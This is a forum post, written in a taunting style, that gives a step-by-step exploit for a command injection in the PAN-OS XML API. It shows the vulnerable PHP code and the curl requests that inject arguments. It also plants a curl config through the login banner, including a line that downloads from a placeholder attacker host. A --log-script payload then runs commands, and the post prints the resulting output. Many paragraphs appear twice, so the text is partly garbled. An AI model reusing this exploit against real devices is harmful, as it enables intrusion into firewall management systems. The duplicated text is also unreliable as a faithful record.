Forum:
hey you little pissbabiez
you think php is so cool, huh? you think php is so great? you talk a lotta big game for someone with such a vuln box!!
while
grepping for command injection, i came across this code in
/var/appweb/htdocs/php/rest/RestApi.php, which handles requests for the
pan-os xml api.
grepping for command injection, i came across this code in
/var/appweb/htdocs/php/rest/RestApi.php, which handles requests for the
pan-os xml api.
$url = self::assertParamPresent("url");
$userName = self::param("user", "dummy");
$password = self::param("password", "dummy");// ---- snip -----
$cmd = sprintf("/usr/bin/curl -k --user %s:%s %s", escapeshellarg($userName), escapeshellarg($password), escapeshellarg($url));
exec($cmd, $response, $exit_status);this
code is reached when requeting /api?type=vmware&action=sync. we
control $userName, $password, and $url. escapeshellarg escapes single
quotes and places single quotes around the text, which means we can't do
normal shell injection or use spaces to inject completely arbitrary
parameters. because of this, the userName and password fields are
basically useless to us since they will always be seen as the argument
for the --user flag. the url, however, is more interesting.
code is reached when requeting /api?type=vmware&action=sync. we
control $userName, $password, and $url. escapeshellarg escapes single
quotes and places single quotes around the text, which means we can't do
normal shell injection or use spaces to inject completely arbitrary
parameters. because of this, the userName and password fields are
basically useless to us since they will always be seen as the argument
for the --user flag. the url, however, is more interesting.
we can verify that we can inject parameters pretty easily.
$ curl -k --user 'user:password' 'https://<management IP>/api/?type=vmware&action=sync&url=--asdf'
<response
status = 'error' code = '400'><result><msg>Internal
Server Error</msg></result></response>
$ curl -k --user 'user:password' 'https://<management IP>/api/?type=vmware&action=sync&url=--help'
<?xml version="1.0"?>
<response status="error" code="17">
<msg>
<line><![CDATA[ request -> partner is unexpected]]></line>
</msg>
</response>valid parameters return a different error from invalid parameters, so our arguments definitely make it through to curl.
using
a single parameter, we can bootstrap our way to multiple parameter
injection with the -K (--config) flag, which loads a curl configuration
file. curl config files are essentially just a list of flags. to place a
config file on disk, the easiest trick is to just set the login banner,
which is stored in /etc/issue. to do this, log into the web management
interface, go to Device->Management->General Settings->Edit
(gear icon), and you can place a curl config in the login banner box.
a single parameter, we can bootstrap our way to multiple parameter
injection with the -K (--config) flag, which loads a curl configuration
file. curl config files are essentially just a list of flags. to place a
config file on disk, the easiest trick is to just set the login banner,
which is stored in /etc/issue. to do this, log into the web management
interface, go to Device->Management->General Settings->Edit
(gear icon), and you can place a curl config in the login banner box.
a config such as
url = "http://<attacker>.com/payload.txt"
-o "/tmp/payload.txt"will
write an arbitrary file. unfortunately, since we're running as nobody
(uid99), arbitrary file writes don't immediately result in easy code
execution. grr.
write an arbitrary file. unfortunately, since we're running as nobody
(uid99), arbitrary file writes don't immediately result in easy code
execution. grr.
luckily, this is palo alto
networks. and palo alto networks likes to make my job easy. they were
kind enough to add a --log-script flag for curl, which will execute
arbitrary commands when certain errors occur. as a poc, you can use the
following payload.
networks. and palo alto networks likes to make my job easy. they were
kind enough to add a --log-script flag for curl, which will execute
arbitrary commands when certain errors occur. as a poc, you can use the
following payload.
url=file:///x/d
-o /rawr/xD
log-script "id>>/var/log/pan/owo;#"then run this command to load the curl config
curl
-k --user '<user>:<password>' 'https://<management
IP>/api/?type=vmware&action=sync&url=-K/etc/issue'you can verify the output from pan cli
> tail mp-log owo
uid=99(nobody) gid=99(nobody) groups=99(nobody)so thats it for todays rad exploit xD
next time i'll show you how to escalate privileges from prep (nobody) to goth (root)
l8rz ^^
Report Topic
